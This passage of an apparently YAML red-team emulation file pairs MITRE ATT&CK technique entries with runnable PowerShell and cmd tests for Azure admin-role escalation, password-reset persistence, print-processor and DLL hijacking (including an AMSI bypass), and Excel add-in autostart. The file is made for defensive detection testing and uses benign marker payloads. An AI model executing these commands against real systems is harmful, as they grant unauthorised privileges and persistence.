an IAM policy or the AttachUserPolicy API to attach an IAM policy
with additional or distinct permissions to a compromised user account.(Citation:
Rhino Security Labs AWS Privilege Escalation)\n\nIn some cases, adversaries
may add roles to adversary-controlled accounts outside the victim cloud tenant.
This allows these external accounts to perform actions inside the victim tenant
without requiring the adversary to [Create Account](https://attack.mitre.org/techniques/T1136)
or modify a victim-owned account.(Citation: Invictus IR DangerDev 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
- Chris Romano, Crowdstrike
- Wojciech Lesicki
- Pià Consigny, Tenable
- Clément Notin, Tenable
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
- Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- Identity Provider
- Office Suite
- SaaS
x_mitre_version: '2.5'
identifier: T1098.003
atomic_tests:
- name: Azure AD - Add Company Administrator Role to a user
auto_generated_guid: 4d77f913-56f5-4a14-b4b1-bf7bb24298ad
description: 'Add an existing Azure user account the Company Administrator Role.
'
supported_platforms:
- azure-ad
input_arguments:
username:
description: Azure AD username
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: string
default: p4sswd
target_user:
description: Name of the user who will be assigned the Company Admin role
type: string
default: default
dependency_executor_name: powershell
dependencies:
- description: 'MSOnline module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name MSOnline -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name MSOnline -Force
'
executor:
command: |
Import-Module MSOnline
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-MsolService -Credential $Credential
Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
cleanup_command: 'Remove-MsolRoleMember -RoleName "Company Administrator"
-RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
'
name: powershell
elevation_required: false
- name: Simulate - Post BEC persistence via user password reset followed by user
added to company administrator role
auto_generated_guid: 14f3af20-61f1-45b8-ad31-4637815f3f44
description: |
This test looks at simulating the an adversary described in the following blog post. It involves resetting the password of a normal user and adding to the company administrator role within M365.
Reference: https://www.huntress.com/blog/business-email-compromise-via-azure-administrative-privileges
supported_platforms:
- azure-ad
input_arguments:
auth_username:
description: Azure AD username used to conduct the adversary activity
type: string
default: jonh@contoso.com
auth_password:
description: Azure AD password for user auth_username
type: string
default: p4sswd
target_user:
description: Name of the user whose password be reset and added to the admin
role.
type: string
default: default
target_password:
description: The password that the user target_user will be reset to.
type: string
default: Ohn05GeMe#$
dependency_executor_name: powershell
dependencies:
- description: 'MSOnline and AzureAD modules must be installed.
'
prereq_command: |
$required_mods = 'AzureAD', 'MSOnline'
$installed_mods = @((Get-Module $required_mods -ListAvailable -ErrorAction SilentlyContinue).Name | Select-Object -Unique)
$notInstalled = Compare-Object $required_mods $installed_mods -PassThru -ErrorAction SilentlyContinue
if ($notInstalled) {
# Prompt for installing the missing ones.
Write-Output "The following PS modules aren't currently installed:"
$notInstalled
exit 1
}
else{
Write-Output "All required PS modules are installed"
exit 0
}
get_prereq_command: |
Install-Module -Name MSOnline -Scope CurrentUser -Force
Install-Module -Name AzureAD -Scope CurrentUser -Force
executor:
command: |
Import-Module MSOnline
Import-Module AzureAD
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
$targetsecurepw = ConvertTo-SecureString -String "#{target_password}" -AsPlainText -Force
Connect-MsolService -Credential $credential -ErrorAction:SilentlyContinue
Connect-AzureAD -Credential $credential -ErrorAction:SilentlyContinue
#Saving the ObjectId of the target_user into a variable
$target_objid = Get-AzureADUser -filter "userPrincipalName eq '#{target_user}'" | Select-Object -ExpandProperty ObjectId
#Reset the password of the target_user
Set-AzureADUserPassword -ObjectId $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue
#Adding target_user
Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
Add-MsolRoleMember -RoleName "Global Reader" -RoleMemberEmailAddress "#{target_user}"
cleanup_command: |
Import-Module MSOnline
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-MsolService -Credential $credential
Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
Remove-MsolRoleMember -RoleName "Global Reader" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
name: powershell
elevation_required: false
T1547.012:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad
created: '2020-10-05T13:24:49.780Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/012
external_id: T1547.012
- source_name: Microsoft AddPrintProcessor May 2018
description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved
October 5, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor
- source_name: Microsoft Intro Print Processors
description: Microsoft. (2023, June 26). Introduction to print processors.
Retrieved September 27, 2023.
url: https://learn.microsoft.com/windows-hardware/drivers/print/introduction-to-print-processors
- source_name: ESET PipeMon May 2020
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:35.261Z'
name: 'Boot or Logon Autostart Execution: Print Processors'
description: |-
Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)
Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver Registry key that points to the DLL.
For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the GetPrintProcessorDirectory API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)
The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mathieu Tartare, ESET
- Tahseen Bin Taj
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1547.012
atomic_tests:
- name: Print Processors
auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
description: |
Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
Note: The test assumes a x64 Windows operating system.
The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
supported_platforms:
- windows
input_arguments:
restart:
description: set to 1 if you want the computer to reboot as part of the
test
type: integer
default: 0
executor:
command: |
if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
net stop spooler
Copy-Item "$PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll" C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
net start spooler
if(#{restart}){
Restart-Computer
}
cleanup_command: |
net stop spooler
rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
net start spooler
name: powershell
elevation_required: true
T1574.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
created: '2020-03-13T18:11:08.357Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/001
external_id: T1574.001
- source_name: Hijack DLLs CrowdStrike
description: " falcon.overwatch.team. (2022, December 30). 4 Ways Adversaries
Hijack DLLs — and How CrowdStrike Falcon OverWatch Fights Back. Retrieved
January 30, 2025."
url: https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/
- source_name: kroll bpl
description: Dave Truman. (2024, June 24). Novel Technique Combination Used
In IDATLOADER Distribution. Retrieved January 30, 2025.
url: https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution
- source_name: Sophos
description: Gabor Szappanos. (2023, May 3). A doubled “Dragon Breath” adds
new air to DLL sideloading attacks. Retrieved October 3, 2025.
url: https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/
- source_name: Hexacorn DLL Hijacking
description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
Retrieved August 14, 2024.
url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: microsoft remote preloading
description: 'Microsoft. (2014, May 13). Microsoft Security Advisory 2269637:
Insecure Library Loading Could Allow Remote Code Execution. Retrieved January
30, 2025.'
url: https://learn.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637
- source_name: Microsoft - manifests/assembly
description: Microsoft. (2021, January 7). Manifests. Retrieved January 30,
2025.
url: https://learn.microsoft.com/en-us/windows/win32/sbscs/manifests?redirectedfrom=MSDN
- source_name: Microsoft redirection
description: Microsoft. (2023, October 12). Dynamic-link library redirection.
Retrieved January 30, 2025.
url: https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN
- source_name: dll pre load owasp
description: OWASP. (n.d.). Binary Planting. Retrieved January 30, 2025.
url: https://owasp.org/www-community/attacks/Binary_planting
- source_name: Virus Bulletin
description: 'Suguru Ishimaru, Hajime Yanagishita, Yusuke Niwa. (2023, October
5). Unveiling activities of Tropic Trooper 2023: deep analysis of Xiangoop
Loader and EntryShell payload. Retrieved October 3, 2025.'
url: https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload/
- source_name: unit 42
description: 'Tom Fakterman, Chen Erlich, & Assaf Dahan. (2024, February 22).
Intruders in the Library: Exploring DLL Hijacking. Retrieved January 30,
2025.'
url: https://unit42.paloaltonetworks.com/dll-hijacking-techniques/
- source_name: Wietze Beukema DLL Hijacking
description: Wietze Beukema. (2020, June 22). Hijacking DLLs in Windows. Retrieved
April 8, 2025.
url: https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:35.900Z'
name: 'Hijack Execution Flow: DLL'
description: |-
Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42)
Specific ways DLLs are abused by adversaries include:
### DLL Sideloading
Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).
Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.
Adversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl)
Adversaries may chain DLL sideloading multiple times to fragment functionality hindering analysis. Adversaries using multiple DLL files can split the loader functions across different DLLs, with a main DLL loading the separated export functions. (Citation: Virus Bulletin) Spreading loader functions across multiple DLLs makes analysis harder, since all files must be collected to fully understand the malware’s behavior. Another method implements a “loader-for-a-loader”, where a malicious DLL’s sole role is to load a second DLL (or a chain of DLLs) that contain the real payload. (Citation: Sophos)
### DLL Search Order Hijacking
Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42)
### DLL Redirection
Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly)
### Phantom DLL Hijacking
Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike)
### DLL Substitution
Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking)
Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses.
Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading)
If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- Ami Holeston, CrowdStrike
- Will Alexander, CrowdStrike
- Wietze Beukema @Wietze
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1574.001
atomic_tests:
- name: DLL Search Order Hijacking - amsi.dll
auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3
description: |
Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)
https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path.
supported_platforms:
- windows
executor:
command: |
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
%APPDATA%\updater.exe -Command exit
cleanup_command: |
del %APPDATA%\updater.exe >nul 2>&1
del %APPDATA%\amsi.dll >nul 2>&1
name: command_prompt
elevation_required: true
- name: Phantom Dll Hijacking - WinAppXRT.dll
auto_generated_guid: 46ed938b-c617-429a-88dc-d49b5c9ffedb
description: ".NET components (a couple of DLLs loaded anytime .NET apps are
executed) when they are loaded they look for an environment variable called
APPX_PROCESS\nSetting the environmental variable and dropping the phantom
WinAppXRT.dll in e.g. c:\\windows\\system32 (or any other location accessible
via PATH) will ensure the \nWinAppXRT.dll is loaded everytime user launches
an application using .NET.\n\nUpon successful execution, amsi.dll will be
copied and renamed to WinAppXRT.dll and then WinAppXRT.dll will be copied
to system32 folder for loading during execution of any .NET application.\n"
supported_platforms:
- windows
executor:
command: |
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
ren %APPDATA%\amsi.dll WinAppXRT.dll
copy %APPDATA%\WinAppXRT.dll %windir%\System32\WinAppXRT.dll
reg add "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /t REG_EXPAND_SZ /d "1" /f
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /f
del %windir%\System32\WinAppXRT.dll
del %APPDATA%\WinAppXRT.dll
name: command_prompt
elevation_required: true
- name: Phantom Dll Hijacking - ualapi.dll
auto_generated_guid: 5898902d-c5ad-479a-8545-6f5ab3cfc87f
description: |
Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart.
Print Spooler service is also configured to auto start. Reboot of system is required
supported_platforms:
- windows
executor:
command: |
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
ren %APPDATA%\amsi.dll ualapi.dll
copy %APPDATA%\ualapi.dll %windir%\System32\ualapi.dll
sc config Spooler start=auto
cleanup_command: |
del %windir%\System32\ualapi.dll
del %APPDATA%\ualapi.dll
name: command_prompt
elevation_required: true
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040
description: |
GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
Upon execution, calc.exe will be opened.
supported_platforms:
- windows
input_arguments:
process_name:
description: Name of the created process
type: string
default: calculator.exe
gup_executable:
description: GUP is an open source signed binary used by Notepad++ for software
updates
type: path
default: PathToAtomicsFolder\T1574.002\bin\GUP.exe
dependency_executor_name: powershell
dependencies:
- description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
'
prereq_command: 'if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
executor:
command: '"#{gup_executable}"
'
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
'
name: command_prompt
- name: DLL Side-Loading using the dotnet startup hook environment variable
auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
description: 'Utilizing the dotnet_startup_hooks environment variable, this
method allows for registering a global method in an assembly that will be
executed whenever a .net core application is started. This unlocks a whole
range of scenarios, from injecting a profiler to tweaking a static context
in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
'
supported_platforms:
- windows
input_arguments:
process_name:
description: Name of the created process
type: string
default: calculator.exe
preloader_dll:
description: library for interfacing with the dotnet framework
type: path
default: PathToAtomicsFolder\T1574.002\bin\preloader.dll
dependency_executor_name: powershell
dependencies:
- description: ".Net SDK must be installed\n"
prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit
0} else {exit 1}
'
get_prereq_command: |
winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
echo.
- description: 'preloader must exist
'
prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
'
get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/bin/preloader.dll?raw=true"
-OutFile "#{preloader_dll}"
'
executor:
command: |
set DOTNET_STARTUP_HOOKS="#{preloader_dll}"
dotnet -h > nul
echo.
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
'
name: command_prompt
- name: DLL Search Order Hijacking,DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE
auto_generated_guid: c095ad8e-4469-4d33-be9d-6f6d1fb21585
description: 'Various threat actors and malware have been found side loading
a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe", which can load
further executables embedded in modified KeyScramblerIE.dll file.
'
supported_platforms:
- windows
executor:
command: |-
Write-Host 1.Downloading KeyScrambler from official website to temp directory
Invoke-WebRequest -Uri "https://download.qfxsoftware.com/download/latest/KeyScrambler_Setup.exe" -OutFile $env:Temp\KeyScrambler_Setup.exe
Write-Host 2.Installing KeyScrambler with KeyScrambler_Setup.exe from temp directory
Start-Process -FilePath $env:Temp\KeyScrambler_Setup.exe -ArgumentList /S -Wait
Write-Host 3.Copying KeyScrambler.exe to temp folder,to avoid permission issues, which calls KeyScramblerIE.dll in CWD i.e. temp
Copy-Item "C:\Program Files (x86)\KeyScrambler\KeyScrambler.exe" -Destination $env:TEMP\KeyScrambler.exe
Write-Host 4.Executing KeyScrambler.exe, you should see a popup of missing KeyScramblerIE.dll, you can close this popup
Start-Process -FilePath $env:Temp\KeyScrambler.exe
Write-Host 5.A modified KeyScramblerIE.dll can be copied to temp, which can be misused by Attacker
cleanup_command: |-
Write-Host 1.Kindly close the popup window asking for KeyScramblerIE.dll ,so that it gets deleted.
Remove-Item -Path $env:Temp\KeyScrambler_Setup.exe
Start-Process -FilePath "C:\Program Files (x86)\KeyScrambler\Uninstall.exe" -ArgumentList /S -Wait
Remove-Item -Path $env:Temp\KeyScrambler.exe
Write-Host 2.KeyScrambler cleanup completed successfully.
name: powershell
elevation_required: true
T1137.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
created: '2019-11-07T19:52:52.801Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1137/006
external_id: T1137.006
- source_name: FireEye Mail CDS 2018
description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
Enterprise Email Compromise. Retrieved November 17, 2024.
url: https://web.archive.org/web/20190508170121/https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- source_name: MRWLabs Office Persistence Add-ins
description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
Persistence. Retrieved November 17, 2024.
url: https://web.archive.org/web/20190526112859/https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- source_name: Microsoft Office Add-ins
description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- source_name: GlobalDotName Jun 2019
description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:37.911Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
Office programs. (Citation: Microsoft Office Add-ins) There are different
types of add-ins that can be used by the various Office products; including
Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object
Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools
for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office
Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\nAdd-ins can be used
to obtain persistence because they can be set to execute code when an Office
application starts. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.006
atomic_tests:
- name: Code Executed Via Excel Add-in File (XLL)
auto_generated_guid: 441b1a0f-a771-428a-8af0-e99e4698cda3
description: |
Loads an XLL file using the excel add-ins library.
This causes excel to launch Notepad.exe as a child process. This atomic test does not include persistent code execution as you would typically see when this is implemented in malware.
supported_platforms:
- windows
dependencies:
- description: 'Microsoft Excel must be installed
'
prereq_command: |
try {
New-Object -COMObject "Excel.Application" | Out-Null
Stop-Process -Name "Excel"
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
manually to meet this requirement"
'
- description: XLL files must exist on disk at specified location
prereq_command: 'if ((Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll")
-and (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll"))
{exit 0} else {exit 1}
'
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/excelxll_x64.xll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll"
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/excelxll_x86.xll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll"
executor:
name: powershell
command: |
$excelApp = New-Object -COMObject "Excel.Application"
if(-not $excelApp.path.contains("Program Files (x86)")){
Write-Host "64-bit Office"
$excelApp.RegisterXLL("PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll")
}
else{
Write-Host "32-bit Office"
$excelApp.RegisterXLL("PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll")
}
cleanup_command: 'Stop-Process -Name "notepad","Excel" -ErrorAction Ignore
'
- name: Persistent Code Execution Via Excel Add-in File (XLL)
auto_generated_guid: 9c307886-9fef-41d5-b344-073a0f5b2f5f
description: |
Creates an Excel Add-in file (XLL) and sets a registry key to make it run automatically when Excel is started
The sample XLL provided launches the notepad as a proof-of-concept for persistent execution from Office.
supported_platforms:
- windows
dependencies:
- description: 'Microsoft Excel must be installed
'
prereq_command: |
try {
New-Object -COMObject "Excel.Application" | Out-Null
Stop-Process -Name "Excel"
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
manually to meet this requirement"
'
- description: XLL files must exist on disk at specified location
prereq_command: 'if ((Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll")
-and (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll"))
{exit 0} else {exit 1}
'
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/excelxll_x64.xll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll"
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/excelxll_x86.xll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll"
executor:
name: powershell
command: |
$excelApp = New-Object -COMObject "Excel.Application"
if(-not $excelApp.path.contains("Program Files (x86)")){
Write-Host "64-bit Office"
Copy "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x64.xll" "$env:APPDATA\Microsoft\AddIns\notepad.xll"
}
else{
Write-Host "32-bit Office"
Copy "PathToAtomicsFolder\T1137.006\bin\Addins\excelxll_x86.xll" "$env:APPDATA\Microsoft\AddIns\notepad.xll"
}
$ver = $excelApp.version
$ExcelRegPath="HKCU:\Software\Microsoft\Office\$Ver\Excel\Options"
Remove-Item $ExcelRegPath -ErrorAction Ignore
New-Item -type Directory $ExcelRegPath | Out-Null
New-ItemProperty $ExcelRegPath OPEN -value "/R notepad.xll" -propertyType string | Out-Null
$excelApp.Quit()
Start-Process "Excel"
cleanup_command: |
$ver = (New-Object -COMObject "Excel.Application").version
Remove-Item "HKCU:\Software\Microsoft\Office\$Ver\Excel\Options" -ErrorAction Ignore
Stop-Process -Name "notepad","Excel" -ErrorAction Ignore
Start-Sleep 3
Remove-Item "$env:APPDATA\Microsoft\AddIns\notepad.xll" -ErrorAction Ignore
- name: Persistent Code Execution Via Word Add-in File (WLL)
